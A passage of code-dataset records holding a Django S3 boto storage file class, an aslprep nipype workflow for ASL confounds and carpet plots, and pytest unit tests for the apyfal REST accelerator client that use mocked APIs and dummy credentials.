in\n order to properly write the file to S3. Be sure to close the file\n in your application.\n \"\"\"\n # TODO: Read/Write (rw) mode may be a bit undefined at the moment. Needs testing.\n # TODO: When Django drops support for Python 2.5, rewrite to use the\n # BufferedIO streams in the Python 2.6 io module.\n\n def __init__(self, name, mode, storage, buffer_size=FILE_BUFFER_SIZE):\n\n self._storage = storage\n\n #Note that in config we can add prefixes\n self.name = name[len(self._storage.location):].lstrip('/')\n self._mode = mode\n self.key = storage.bucket.get_key(self._storage._encode_name(name))\n if not self.key and 'w' in mode:\n self.key = storage.bucket.new_key(storage._encode_name(name))\n\n self._is_dirty = False\n self._file = None\n self._multipart = None\n # 5 MB is the minimum part size (if there is more than one part).\n # Amazon allows up to 10,000 parts. The default supports uploads\n # up to roughly 50 GB. Increase the part size to accommodate\n # for files larger than this.\n self._write_buffer_size = buffer_size\n self._write_counter = 0\n\n @property\n def size(self):\n return self.key.size\n\n def _get_file(self):\n if self._file is None:\n\n # io.StringIO(initial_value='', newline='\\n')\n # An in-memory stream for text I/O.\n # StringIO can be used where a file was expected\n self._file = StringIO()\n if 'rb' == self._mode:\n self._file = BytesIO()\n if 'r' in self._mode:\n self._is_dirty = False\n self.key.get_contents_to_file(self._file)\n self._file.seek(0)\n if self._storage.gzip and self.key.content_encoding == 'gzip':\n self._file = GzipFile(mode=self._mode, fileobj=self._file)\n return self._file\n\n def _set_file(self, value):\n self._file = value\n\n file = property(_get_file, _set_file)\n\n def read(self, *args, **kwargs):\n if 'r' not in self._mode:\n raise AttributeError(\"File was not opened in read mode.\")\n return super(S3BotoStorageFile, self).read(*args, **kwargs)\n\n def write(self, *args, **kwargs):\n if 'w' not in self._mode:\n raise AttributeError(\"File was not opened in write mode.\")\n self._is_dirty = True\n if self._multipart is None:\n provider = self.key.bucket.connection.provider\n upload_headers = {\n provider.acl_header: self._storage.acl\n }\n upload_headers.update(self._storage.headers)\n self._multipart = self._storage.bucket.initiate_multipart_upload(\n self.key.name,\n headers=upload_headers,\n reduced_redundancy=self._storage.reduced_redundancy\n )\n if self._write_buffer_size <= self._buffer_file_size:\n self._flush_write_buffer()\n return super(S3BotoStorageFile, self).write(*args, **kwargs)\n\n @property\n def _buffer_file_size(self):\n pos = self.file.tell()\n self.file.seek(0, os.SEEK_END)\n length = self.file.tell()\n self.file.seek(pos)\n return length\n\n def _flush_write_buffer(self):\n \"\"\"\n Flushes the write buffer.\n \"\"\"\n if self._buffer_file_size:\n self._write_counter += 1\n self.file.seek(0)\n self._multipart.upload_part_from_file(\n self.file,\n self._write_counter,\n headers=self._storage.headers\n )\n self.file.close()\n self._file = None\n\n def close(self):\n if self._is_dirty:\n self._flush_write_buffer()\n self._multipart.complete_upload()\n else:\n if not self._multipart is None:\n self._multipart.cancel_upload()\n self.key.close()\n","sub_path":"s3Manager/s3boto.py","file_name":"s3boto.py","file_ext":"py","file_size_in_byte":21804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"199245205","text":"# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\"\"\"\nCalculate asl confounds\n^^^^^^^^^^^^^^^^^^^^^^^^\n\n.. autofunction:: init_asl_confs_wf\n\n\n\"\"\"\nfrom os import getenv\nfrom nipype.pipeline import engine as pe\nfrom nipype.interfaces import utility as niu, fsl\nfrom nipype.algorithms import confounds as nac\n\nfrom templateflow.api import get as get_template\nfrom ...niworkflows.engine.workflows import LiterateWorkflow as Workflow\nfrom ...niworkflows.interfaces.confounds import ExpandModel, SpikeRegressors\nfrom ...niworkflows.interfaces.fixes import FixHeaderApplyTransforms as ApplyTransforms\nfrom ...niworkflows.interfaces.images import SignalExtraction\nfrom ...niworkflows.interfaces.masks import ROIsPlot\nfrom ...niworkflows.interfaces.utility import KeySelect\nfrom ...niworkflows.interfaces.patches import (\n RobustACompCor as ACompCor,\n RobustTCompCor as TCompCor,\n)\nfrom ...niworkflows.interfaces.plotting import (\n CompCorVariancePlot, ConfoundsCorrelationPlot\n)\nfrom ...niworkflows.interfaces.segmentation import ICA_AROMARPT\nfrom ...niworkflows.interfaces.utils import (\n TPM2ROI, AddTPMs, AddTSVHeader, TSV2JSON, DictMerge\n)\n\nfrom ...config import DEFAULT_MEMORY_MIN_GB\nfrom ...interfaces import (\n GatherConfounds, \n ASLSummary, DerivativesDataSink\n)\n\n\ndef init_asl_confs_wf(\n mem_gb,\n metadata,\n name=\"asl_confs_wf\",\n):\n \"\"\"\n Build a workflow to generate and write out confounding signals.\n\n This workflow calculates confounds for a asl series, and aggregates them\n into a :abbr:`TSV (tab-separated value)` file, for use as nuisance\n regressors in a :abbr:`GLM (general linear model)`.\n The following confounds are calculated, with column headings in parentheses:\n\n #. DVARS - original and standardized variants (``dvars``, ``std_dvars``)\n #. Framewise displacement, based on head-motion parameters\n (``framewise_displacement``)\n #. Estimated head-motion parameters, in mm and rad\n (``trans_x``, ``trans_y``, ``trans_z``, ``rot_x``, ``rot_y``, ``rot_z``)\n\n Workflow Graph\n .. workflow::\n :graph2use: orig\n :simple_form: yes\n\n from aslprep.workflows.asl.confounds import init_asl_confs_wf\n wf = init_asl_confs_wf(\n mem_gb=1,\n metadata={},\n )\n\n Parameters\n ----------\n mem_gb : :obj:`float`\n Size of asl file in GB - please note that this size\n should be calculated after resamplings that may extend\n the FoV\n metadata : :obj:`dict`\n BIDS metadata for asl file\n name : :obj:`str`\n Name of workflow (default: ``asl_confs_wf``)\n\n\n Inputs\n ------\n asl\n asl image, after the prescribed corrections (STC, HMC and SDC)\n when available.\n asl_mask\n asl series mask\n movpar_file\n SPM-formatted motion parameters file\n skip_vols\n number of non steady state volumes\n t1w_mask\n Mask of the skull-stripped template image\n t1w_tpms\n List of tissue probability maps in T1w space\n t1_asl_xform\n Affine matrix that maps the T1w space into alignment with\n the native asl space\n\n Outputs\n -------\n confounds_file\n TSV of all aggregated confounds\n confounds_metadata\n Confounds metadata dictionary.\n\n \"\"\"\n workflow = Workflow(name=name)\n workflow.__desc__ = \"\"\"\\\nSeveral confounding time-series were calculated based on the\n*preprocessed ASL*: framewise displacement (FD) and DVARS. \nFD and DVARS are calculated for each ASL run, both using their\nimplementations in *Nipype* [following the definitions by @power_fd_dvars].\nThe head-motion estimates calculated in the correction step were also\nplaced within the corresponding confounds file.\n\n\"\"\"\n inputnode = pe.Node(niu.IdentityInterface(\n fields=['asl', 'asl_mask', 'movpar_file', 'skip_vols',\n 't1w_mask', 't1w_tpms', 't1_asl_xform']),\n name='inputnode')\n outputnode = pe.Node(niu.IdentityInterface(\n fields=['confounds_file', 'confounds_metadata']),\n name='outputnode')\n\n # DVARS\n dvars = pe.Node(nac.ComputeDVARS(save_nstd=True, save_std=True, remove_zerovariance=True),\n name=\"dvars\", mem_gb=mem_gb)\n\n # Frame displacement\n fdisp = pe.Node(nac.FramewiseDisplacement(parameter_source=\"SPM\"),\n name=\"fdisp\", mem_gb=mem_gb)\n\n\n # Global and segment regressors\n #signals_class_labels = [\"csf\", \"white_matter\", \"global_signal\"]\n\n # Arrange confounds\n add_dvars_header = pe.Node(\n AddTSVHeader(columns=[\"dvars\"]),\n name=\"add_dvars_header\", mem_gb=0.01, run_without_submitting=True)\n add_std_dvars_header = pe.Node(\n AddTSVHeader(columns=[\"std_dvars\"]),\n name=\"add_std_dvars_header\", mem_gb=0.01, run_without_submitting=True)\n add_motion_headers = pe.Node(\n AddTSVHeader(columns=[\"trans_x\", \"trans_y\", \"trans_z\", \"rot_x\", \"rot_y\", \"rot_z\"]),\n name=\"add_motion_headers\", mem_gb=0.01, run_without_submitting=True)\n concat = pe.Node(GatherConfounds(), name=\"concat\", mem_gb=0.01, run_without_submitting=True)\n\n\n\n # Expand model to include derivatives and quadratics\n\n workflow.connect([\n # connect inputnode to each non-anatomical confound node\n (inputnode, dvars, [('asl', 'in_file'),\n ('asl_mask', 'in_mask')]),\n (inputnode, fdisp, [('movpar_file', 'in_file')]),\n # Collate computed confounds together\n (inputnode, add_motion_headers, [('movpar_file', 'in_file')]),\n (dvars, add_dvars_header, [('out_nstd', 'in_file')]),\n (dvars, add_std_dvars_header, [('out_std', 'in_file')]),\n (fdisp, concat, [('out_file', 'fd')]),\n (add_motion_headers, concat, [('out_file', 'motion')]),\n (add_dvars_header, concat, [('out_file', 'dvars')]),\n (add_std_dvars_header, concat, [('out_file', 'std_dvars')]),\n\n # Expand the model with derivatives, quadratics, and spikes\n\n # Set outputs\n (concat, outputnode, [('confounds_file', 'confounds_file')]),\n \n ])\n\n return workflow\n\n\ndef init_carpetplot_wf(mem_gb, metadata, name=\"asl_carpet_wf\"):\n \"\"\"\n Build a workflow to generate *carpet* plots.\n\n Resamples the MNI parcellation (ad-hoc parcellation derived from the\n Harvard-Oxford template and others).\n\n Parameters\n ----------\n mem_gb : :obj:`float`\n Size of ASL file in GB - please note that this size\n should be calculated after resamplings that may extend\n the FoV\n metadata : :obj:`dict`\n BIDS metadata for ASL file\n name : :obj:`str`\n Name of workflow (default: ``asl_carpet_wf``)\n\n Inputs\n ------\n asl\n asl image, after the prescribed corrections (STC, HMC and SDC)\n when available.\n asl_mask\n ASL series mask\n confounds_file\n TSV of all aggregated confounds\n t1_asl_xform\n Affine matrix that maps the T1w space into alignment with\n the native ASL space\n std2anat_xfm\n ANTs-compatible affine-and-warp transform file\n\n Outputs\n -------\n out_carpetplot\n Path of the generated SVG file\n\n \"\"\"\n inputnode = pe.Node(niu.IdentityInterface(\n fields=['asl', 'asl_mask', 'confounds_file',\n 't1_asl_xform', 'std2anat_xfm']),\n name='inputnode')\n\n outputnode = pe.Node(niu.IdentityInterface(\n fields=['out_carpetplot']), name='outputnode')\n\n # List transforms\n mrg_xfms = pe.Node(niu.Merge(2), name='mrg_xfms')\n\n # Warp segmentation into EPI space\n resample_parc = pe.Node(ApplyTransforms(\n float=True,\n input_image=str(get_template(\n 'MNI152NLin2009cAsym', resolution=1, desc='carpet',\n suffix='dseg', extension=['.nii', '.nii.gz'])),\n dimension=3, default_value=0, interpolation='MultiLabel'),\n name='resample_parc')\n\n # Carpetplot and confounds plot\n conf_plot = pe.Node(ASLSummary(\n tr=metadata['RepetitionTime'],\n confounds_list=[\n ('std_dvars', None, 'DVARS'),\n ('framewise_displacement', 'mm', 'FD')]),\n name='conf_plot', mem_gb=mem_gb)\n ds_report_asl_conf = pe.Node(\n DerivativesDataSink(desc='carpetplot',datatype=\"figures\", \n keep_dtype=True),\n name='ds_report_asl_conf', run_without_submitting=True,\n mem_gb=DEFAULT_MEMORY_MIN_GB)\n\n workflow = Workflow(name=name)\n workflow.connect([\n (inputnode, mrg_xfms, [('t1_asl_xform', 'in1'),\n ('std2anat_xfm', 'in2')]),\n (inputnode, resample_parc, [('asl_mask', 'reference_image')]),\n (mrg_xfms, resample_parc, [('out', 'transforms')]),\n # Carpetplot\n (inputnode, conf_plot, [\n ('asl', 'in_func'),\n ('asl_mask', 'in_mask'),\n ('confounds_file', 'confounds_file')]),\n (resample_parc, conf_plot, [('output_image', 'in_segm')]),\n (conf_plot, ds_report_asl_conf, [('out_file', 'in_file')]),\n (conf_plot, outputnode, [('out_file', 'out_carpetplot')]),\n ])\n return workflow\n\n\ndef _remove_volumes(asl_file, skip_vols):\n \"\"\"Remove skip_vols from asl_file.\"\"\"\n import nibabel as nb\n from nipype.utils.filemanip import fname_presuffix\n\n if skip_vols == 0:\n return asl_file\n\n out = fname_presuffix(asl_file, suffix='_cut')\n asl_img = nb.load(asl_file)\n asl_img.__class__(asl_img.dataobj[..., skip_vols:],\n asl_img.affine, asl_img.header).to_filename(out)\n\n return out\n\n\ndef _add_volumes(asl_file, asl_cut_file, skip_vols):\n \"\"\"Prepend skip_vols from asl_file onto asl_cut_file.\"\"\"\n import nibabel as nb\n import numpy as np\n from nipype.utils.filemanip import fname_presuffix\n\n if skip_vols == 0:\n return asl_cut_file\n\n asl_img = nb.load(asl_file)\n asl_cut_img = nb.load(asl_cut_file)\n\n asl_data = np.concatenate((asl_img.dataobj[..., :skip_vols],\n asl_cut_img.dataobj), axis=3)\n\n out = fname_presuffix(asl_cut_file, suffix='_addnonsteady')\n asl_img.__class__(asl_data, asl_img.affine, asl_img.header).to_filename(out)\n\n return out\n\n\ndef _maskroi(in_mask, roi_file):\n import numpy as np\n import nibabel as nb\n from nipype.utils.filemanip import fname_presuffix\n\n roi = nb.load(roi_file)\n roidata = roi.get_data().astype(np.uint8)\n msk = nb.load(in_mask).get_data().astype(bool)\n roidata[~msk] = 0\n roi.set_data_dtype(np.uint8)\n\n out = fname_presuffix(roi_file, suffix='_aslmsk')\n roi.__class__(roidata, roi.affine, roi.header).to_filename(out)\n return out","sub_path":"aslprep/workflows/asl/confounds.py","file_name":"confounds.py","file_ext":"py","file_size_in_byte":10732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"144386831","text":"# coding=utf-8\n\"\"\"apyfal.client.rest tests\"\"\"\nimport collections\nfrom contextlib import contextmanager\nimport copy\nimport io\nimport gc\nimport json\nimport sys\n\nimport pytest\nimport requests\n\n\ndef test_restclient_is_alive():\n \"\"\"Tests RESTClient.is_alive\"\"\"\n from apyfal.client.rest import RESTClient\n from apyfal.exceptions import ClientRuntimeException\n\n # Mock some accelerators parts\n class DummyAccelerator(RESTClient):\n \"\"\"Dummy AcceleratorClient\"\"\"\n\n def __init__(self, host_ip=None):\n \"\"\"Do not initialize\"\"\"\n self._url = host_ip\n\n def __del__(self):\n \"\"\"Do nothing\"\"\"\n\n # Test: No host\n client = DummyAccelerator()\n with pytest.raises(ClientRuntimeException):\n client._is_alive()\n\n # Test: URL exists\n client = DummyAccelerator(\n host_ip='https://www.accelize.com')\n client._is_alive()\n\n # Test: URL not exist\n client = DummyAccelerator(\n host_ip='https://www.url_that_not_exists.accelize.com')\n with pytest.raises(ClientRuntimeException):\n client._is_alive()\n\n\ndef test_restclient_url():\n \"\"\"Tests RESTClient.url\"\"\"\n from apyfal.client.rest import RESTClient\n from apyfal.exceptions import ClientConfigurationException\n\n # Mock some accelerators parts\n class DummyAccelerator(RESTClient):\n \"\"\"Dummy AcceleratorClient\"\"\"\n use_last_configuration_called = False\n\n def __del__(self):\n \"\"\"Does nothing\"\"\"\n\n def _use_last_configuration(self):\n \"\"\"Checks if called\"\"\"\n self.use_last_configuration_called = True\n\n accelerator = DummyAccelerator('Dummy')\n\n # Test: No accelerator provided\n with pytest.raises(ClientConfigurationException):\n DummyAccelerator()\n\n # Test: No URL provided\n with pytest.raises(ClientConfigurationException):\n accelerator.url = None\n\n with pytest.raises(ClientConfigurationException):\n accelerator.url = ''\n\n # Test: Invalid URL provided\n # Not for test all bad URL cases, only that check_url\n # function is properly called\n with pytest.raises(ValueError):\n accelerator.url = 'http://url_not_valid'\n\n # Test: Valid URL\n ip_address = '127.0.0.1'\n url = 'http://%s' % ip_address\n accelerator.url = url\n assert accelerator._url == url\n assert accelerator._api_client.configuration.host == url\n assert accelerator.use_last_configuration_called\n\n # Test: URL set with IP\n accelerator.url = ip_address\n assert accelerator._url == url\n\n\ndef test_restclient_start():\n \"\"\"Tests RESTClient.start\"\"\"\n from apyfal.client.rest import RESTClient\n from apyfal.exceptions import ClientRuntimeException\n import apyfal.client.rest._openapi as rest_api\n\n # Mock OpenApi REST API ConfigurationApi\n excepted_parameters = None\n excepted_datafile = None\n configuration_read_in_error = 0\n\n base_parameters_result = {\n 'app': {'status': 0, 'msg': 'dummy_msg'}}\n\n class ConfigurationApi:\n \"\"\"Fake rest_api.ConfigurationApi\"\"\"\n\n def __init__(self, api_client):\n \"\"\"Store API client\"\"\"\n self.api_client = api_client\n\n @staticmethod\n def configuration_create(parameters, datafile):\n \"\"\"Checks input arguments and returns fake response\"\"\"\n\n # Check parameters\n if excepted_parameters is not None:\n assert json.loads(parameters) == excepted_parameters\n if excepted_datafile is not None:\n assert datafile == excepted_datafile\n\n # Return response\n Response = collections.namedtuple(\n 'Response', ['url', 'id', 'parametersresult'])\n\n return Response(\n url='dummy_url', id='dummy_id',\n parametersresult=json.dumps(base_parameters_result))\n\n @staticmethod\n def configuration_read(id_value):\n \"\"\"Checks input arguments and returns fake response\"\"\"\n Response = collections.namedtuple('Response', ['inerror', 'id', 'url'])\n\n # Check parameters\n assert id_value == 'dummy_id'\n\n # Return response\n return Response(url='dummy_url', id=id_value, inerror=configuration_read_in_error)\n\n # Mock some accelerators parts\n class DummyAccelerator(RESTClient):\n \"\"\"Dummy AcceleratorClient\"\"\"\n\n def __del__(self):\n \"\"\"Does nothing\"\"\"\n\n @staticmethod\n @contextmanager\n def _data_file(url, *_, **__):\n \"\"\"Skip file presence check\"\"\"\n yield url\n\n @property\n def url(self):\n \"\"\"Fake URL\"\"\"\n return 'dummy_accelerator_url'\n\n client_id = 'dummy_client_id'\n secret_id = 'dummy_secret_id'\n\n accelerator = DummyAccelerator(\n 'Dummy', accelize_client_id=client_id,\n accelize_secret_id=secret_id)\n\n base_parameters = {\n \"env\": {\n \"client_id\": client_id,\n \"client_secret\": secret_id}}\n\n base_response = {'url_config': 'dummy_url',\n 'url_instance': accelerator.url}\n\n # Monkey patch OpenAPI client with mocked API\n rest_api_configuration_api = rest_api.ConfigurationApi\n rest_api.ConfigurationApi = ConfigurationApi\n\n # Tests\n try:\n # Check with arguments\n accelerator_parameters = {'dummy_param': None}\n excepted_parameters = base_parameters.copy()\n excepted_parameters.update(accelerator._configuration_parameters)\n excepted_parameters['app']['specific'] = accelerator_parameters\n excepted_datafile = 'dummy_datafile'\n excepted_response = base_response.copy()\n excepted_response.update(base_parameters_result)\n\n assert excepted_response == accelerator.start(\n datafile=excepted_datafile, info_dict=True,\n **accelerator_parameters)\n\n # Check default values\n excepted_datafile = ''\n excepted_parameters = base_parameters.copy()\n excepted_parameters.update(accelerator._configuration_parameters)\n excepted_response = base_response.copy()\n excepted_response.update(base_parameters_result)\n\n # On already configured\n assert accelerator.start(info_dict=True) is None\n\n # On not configured\n accelerator._configuration_url = None\n assert accelerator.start(info_dict=True) == excepted_response\n\n # Check error from host\n configuration_read_in_error = 1\n accelerator._configuration_url = None\n with pytest.raises(ClientRuntimeException):\n accelerator.start()\n\n # Restore OpenApi client API\n finally:\n rest_api.ConfigurationApi = rest_api_configuration_api\n\n\ndef test_restclient_use_last_configuration():\n \"\"\"Tests RESTClient._use_last_configuration\"\"\"\n from apyfal.client.rest import RESTClient\n import apyfal.client.rest._openapi as rest_api\n\n # Mock OpenApi REST API ConfigurationApi\n Config = collections.namedtuple('Config', ['url', 'used'])\n config_list = []\n configuration_list_raises = False\n\n class ConfigurationApi:\n \"\"\"Fake rest_api.ConfigurationApi\"\"\"\n\n def __init__(self, api_client):\n \"\"\"Store API client\"\"\"\n self.api_client = api_client\n\n @staticmethod\n def configuration_list():\n \"\"\"Returns fake response\"\"\"\n if configuration_list_raises:\n raise ValueError\n Response = collections.namedtuple('Response', ['results'])\n return Response(results=config_list)\n\n # Monkey patch OpenApi client with mocked API\n rest_api_configuration_api = rest_api.ConfigurationApi\n rest_api.ConfigurationApi = ConfigurationApi\n\n # Tests:\n # method called through AcceleratorClient.url, through AcceleratorClient.__init__\n try:\n\n # No previous configuration\n accelerator = RESTClient(\n 'Dummy', host_ip='https://www.accelize.com')\n assert accelerator._configuration_url is None\n\n configuration_list_raises = True\n accelerator = RESTClient(\n 'Dummy', host_ip='https://www.accelize.com')\n assert accelerator._configuration_url is None\n configuration_list_raises = False\n\n # Unused previous configuration\n config_list.append(Config(url='dummy_config_url', used=0))\n accelerator = RESTClient(\n 'Dummy', host_ip='https://www.accelize.com')\n assert accelerator._configuration_url is None\n\n # Used previous configuration\n config_list.insert(0, Config(url='dummy_config_url_2', used=1))\n accelerator = RESTClient(\n 'Dummy', host_ip='https://www.accelize.com')\n assert accelerator._configuration_url == 'dummy_config_url_2'\n\n # Restore OpenApi client API\n finally:\n rest_api.ConfigurationApi = rest_api_configuration_api\n\n\ndef test_restclient_stop():\n \"\"\"Tests RESTClient.stop\"\"\"\n from apyfal.client.rest import RESTClient\n from apyfal.exceptions import ClientRuntimeException\n import apyfal.client.rest._openapi as rest_api\n\n # Mock OpenApi REST API StopApi\n is_alive = True\n stop_list = {'app': {'status': 0, 'msg': ''}}\n stop_list_raise = None\n\n class StopApi:\n \"\"\"Fake rest_api.StopApi\"\"\"\n is_running = True\n\n def __init__(self, api_client):\n \"\"\"Store API client\"\"\"\n self.api_client = api_client\n\n @classmethod\n def stop_list(cls):\n \"\"\"Simulates accelerator stop and returns fake response\"\"\"\n # Stop AcceleratorClient\n cls.is_running = False\n\n # Fake error\n if stop_list_raise:\n raise rest_api.rest.ApiException\n\n # Return result\n return stop_list\n\n # Mock some accelerators parts\n class DummyAccelerator(RESTClient):\n \"\"\"Dummy AcceleratorClient\"\"\"\n\n def _is_alive(self):\n \"\"\"Raise on demand\"\"\"\n if not is_alive:\n raise ClientRuntimeException()\n\n # Monkey patch OpenApi client with mocked API\n rest_api_stop_api = rest_api.StopApi\n rest_api.StopApi = StopApi\n\n # Tests\n try:\n # AcceleratorClient to stop\n accelerator = DummyAccelerator('Dummy')\n assert accelerator.stop(info_dict=True) == stop_list\n assert not StopApi.is_running\n\n # Ignore OpenApi exceptions\n stop_list_raise = True\n assert DummyAccelerator('Dummy').stop(\n info_dict=True) is None\n assert not StopApi.is_running\n stop_list_raise = False\n\n # Auto-stops with context manager\n StopApi.is_running = True\n with DummyAccelerator('Dummy') as accelerator:\n # Checks __enter__ returned object\n assert isinstance(accelerator, RESTClient)\n assert not StopApi.is_running\n\n # Auto-stops on garbage collection\n StopApi.is_running = True\n DummyAccelerator('Dummy')\n gc.collect()\n assert not StopApi.is_running\n\n # No accelerator to stop\n is_alive = False\n assert DummyAccelerator('Dummy').stop(\n info_dict=True) is None\n\n # Restore OpenApi client API\n finally:\n rest_api.StopApi = rest_api_stop_api\n\n\ndef test_restclient_process_curl():\n \"\"\"Tests RESTClient._process_curl with PycURL\"\"\"\n # Skip if PycURL not available\n try:\n import pycurl\n except ImportError:\n pytest.skip('Pycurl module required')\n return\n\n # Check PycURL is enabled in accelerator API\n import apyfal.client.rest\n assert apyfal.client.rest._USE_PYCURL\n\n # Start testing\n from apyfal.client.rest import RESTClient\n from apyfal.exceptions import ClientRuntimeException\n\n # Mock some accelerators parts\n class DummyAccelerator(RESTClient):\n \"\"\"Dummy AcceleratorClient\"\"\"\n\n def __del__(self):\n \"\"\"Does nothing\"\"\"\n\n # Mock PycURL\n pycurl_curl = pycurl.Curl\n perform_raises = False\n api_response = ''\n\n class Curl:\n \"\"\"Fake cURL that don\"t communicate\"\"\"\n mock_write = None\n\n def __init__(self):\n self.curl = pycurl_curl()\n\n def perform(self):\n \"\"\"Don't communicated but write in buffer\"\"\"\n # Simulate exception\n if perform_raises:\n raise pycurl.error\n\n # Write api_response\n self.mock_write.write(api_response.encode())\n\n def setopt(self, *args):\n \"\"\"set cURL options and intercept WRITEDATA\"\"\"\n if args[0] == pycurl.WRITEDATA:\n self.mock_write = args[1]\n self.curl.setopt(*args)\n\n def close(self):\n \"\"\"Close curl\"\"\"\n self.curl.close()\n\n pycurl.Curl = Curl\n\n # Tests\n try:\n # Mock some variables\n dummy_parameters = 'dummy_accelerator_parameters'\n dummy_datafile = 'dummy_datafile'\n\n accelerator = DummyAccelerator('Dummy')\n accelerator._configuration_url = 'dummy_configuration'\n\n # Test if work as excepted\n expected_response = {'id': 'dummy_id', 'processed': 'dummy_processed'}\n api_response = json.dumps(expected_response)\n response_id, processed = accelerator._process_curl(\n dummy_parameters, dummy_datafile)\n assert response_id == expected_response['id']\n assert processed == expected_response['processed']\n\n # Test: Invalid response\n api_response = '{id: corrupted_data'\n with pytest.raises(ClientRuntimeException):\n accelerator._process_curl(\n dummy_parameters, dummy_datafile)\n\n # Test: No id in response\n api_response = '{}'\n with pytest.raises(ClientRuntimeException):\n accelerator._process_curl(\n dummy_parameters, dummy_datafile)\n\n # Test: Curl.perform raise Exception\n perform_raises = True\n with pytest.raises(ClientRuntimeException):\n accelerator._process_curl(\n dummy_parameters, dummy_datafile)\n\n # Restore PycURL\n finally:\n pycurl.Curl = pycurl_curl\n\n\ndef test_restclient_process_openapi():\n \"\"\"Tests RESTClient._process_openapi with OpenApi\"\"\"\n # Clean imported modules\n # to force to reimport without PycURL if present\n pycurl_module = sys.modules.get('pycurl')\n if pycurl_module is not None:\n sys.modules['pycurl'] = None\n for module in list(sys.modules):\n if module.startswith('apyfal.client.rest'):\n del sys.modules[module]\n gc.collect()\n\n # Check PycURL is disabled in accelerator API\n import apyfal.client.rest\n assert not apyfal.client.rest._USE_PYCURL\n\n # Starts testing with PycURL disabled\n try:\n from apyfal.client.rest import RESTClient\n import apyfal.client.rest._openapi as rest_api\n\n # Mock some variables\n dummy_id = 'dummy_id'\n dummy_processed = 'dummy_processed'\n dummy_parameters = 'dummy_accelerator_parameters'\n dummy_datafile = 'dummy_datafile'\n dummy_configuration = 'dummy_configuration'\n\n # Mocks OpenApi REST API ProcessApi\n class ProcessApi:\n \"\"\"Fake rest_api.ProcessApi\"\"\"\n\n def __init__(self, api_client):\n \"\"\"Store API client\"\"\"\n self.api_client = api_client\n\n @staticmethod\n def process_create(configuration, parameters, datafile):\n \"\"\"Checks input arguments and returns fake response\"\"\"\n assert parameters == dummy_parameters\n assert datafile == dummy_datafile\n assert configuration == dummy_configuration\n\n # Return fake response\n Response = collections.namedtuple('Response', ['processed', 'id'])\n return Response(id=dummy_id, processed=dummy_processed)\n\n # Mock some accelerators parts\n class DummyAccelerator(RESTClient):\n \"\"\"Dummy AcceleratorClient\"\"\"\n\n def __del__(self):\n \"\"\"Does nothing\"\"\"\n\n # Monkey patch OpenApi client with mocked API\n rest_api_process_api = rest_api.ProcessApi\n rest_api.ProcessApi = ProcessApi\n\n # Tests\n try:\n # Test if work as excepted\n accelerator = DummyAccelerator('Dummy')\n accelerator._configuration_url = dummy_configuration\n\n response_id, processed = accelerator._process_openapi(\n dummy_parameters, dummy_datafile)\n assert response_id == dummy_id\n assert processed == dummy_processed\n\n # Restore OpenApi API\n finally:\n rest_api.ProcessApi = rest_api_process_api\n\n # Restores PycURL\n finally:\n if pycurl_module is not None:\n sys.modules['pycurl'] = pycurl_module\n for module in list(sys.modules):\n if module.startswith('apyfal.client.rest'):\n del sys.modules[module]\n gc.collect()\n\n\ndef test_restclient_process(tmpdir):\n \"\"\"Tests RESTClient._process\"\"\"\n import apyfal.exceptions as exc\n import apyfal.client.rest._openapi as rest_api\n from apyfal.client.rest import RESTClient\n\n # Creates temporary output dir and file in\n tmp_dir = tmpdir.dirpath()\n file_in = tmp_dir.join('file_in.txt')\n dir_out = tmp_dir.join('subdir')\n file_out = dir_out.join('file_out.txt')\n\n # Mocks some variables\n processed = False\n in_error = True\n specific = {'result': '1'}\n parameters_result = {'app': {\n 'status': 0,\n 'msg': 'dummy_parameters_result',\n 'specific': specific}}\n datafile_result = {'app': {\n 'status': 0, 'msg': 'dummy_datafile_result'}}\n out_content = b'file out content'\n\n # Mocks OpenApi REST API ProcessApi\n class ProcessApi:\n \"\"\"Fake rest_api.ProcessApi\"\"\"\n\n def __init__(self, api_client):\n \"\"\"Store API client\"\"\"\n self.api_client = api_client\n\n @staticmethod\n def process_read(id_value):\n \"\"\"Checks input arguments and returns fake response\"\"\"\n Response = collections.namedtuple(\n 'Response', ['processed', 'inerror',\n 'parametersresult', 'datafileresult'])\n\n # Check parameters\n assert id_value == 'dummy_id'\n\n # Returns response\n return Response(\n processed=True, inerror=in_error,\n parametersresult=json.dumps(parameters_result),\n datafileresult=json.dumps(datafile_result))\n\n @staticmethod\n def process_delete(id_value):\n \"\"\"Checks input arguments\"\"\"\n # Check parameters\n assert id_value == 'dummy_id'\n\n # Mock some accelerators parts\n class DummyAccelerator(RESTClient):\n \"\"\"Dummy AcceleratorClient\"\"\"\n\n def _process_openapi(self, accelerator_parameters, datafile):\n \"\"\"Mocks process function (tested separately)\n\n Checks input arguments and returns fake response\"\"\"\n # Checks input parameters\n assert json.loads(accelerator_parameters) == self._process_parameters\n assert datafile == file_in\n\n # Returns fake result\n return 'dummy_id', processed\n\n _process_curl = _process_openapi\n\n def __del__(self):\n \"\"\"Does nothing\"\"\"\n\n # Mocks requests in utilities\n class DummySession(requests.Session):\n \"\"\"Fake requests.Session\"\"\"\n\n @staticmethod\n def get(datafile_result_arg, **_):\n \"\"\"Checks input arguments and returns fake response\"\"\"\n Response = collections.namedtuple('Response', ['raw'])\n\n # Checks input parameters\n assert json.loads(datafile_result_arg) == datafile_result\n\n # Returns fake response\n return Response(raw=io.BytesIO(out_content))\n\n # Monkey patch OpenApi client with mocked API\n openapi_client_process_api = rest_api.ProcessApi\n rest_api.ProcessApi = ProcessApi\n\n # Monkey patch requests in utilities\n requests_session = requests.Session\n requests.Session = DummySession\n\n # Tests\n try:\n # Test accelerator not configured\n accelerator = DummyAccelerator('Dummy')\n with pytest.raises(exc.ClientConfigurationException):\n accelerator.process()\n\n accelerator._configuration_url = 'dummy_configuration'\n\n # Test input file not exists\n with pytest.raises(exc.ClientConfigurationException):\n accelerator.process(str(file_in), str(file_out))\n\n # Creates input file\n file_in.write('file in content')\n assert file_in.check(file=True)\n\n # Test result \"inerror\" and output-dir creation\n assert not dir_out.check(dir=True)\n\n with pytest.raises(exc.ClientRuntimeException):\n accelerator.process(str(file_in), str(file_out))\n\n assert dir_out.check(dir=True)\n\n # Sets to not in error\n in_error = False\n\n # Check if working as excepted\n expected_parameters_result = copy.deepcopy(parameters_result)\n del expected_parameters_result['app']['specific']\n assert accelerator.process(\n str(file_in), 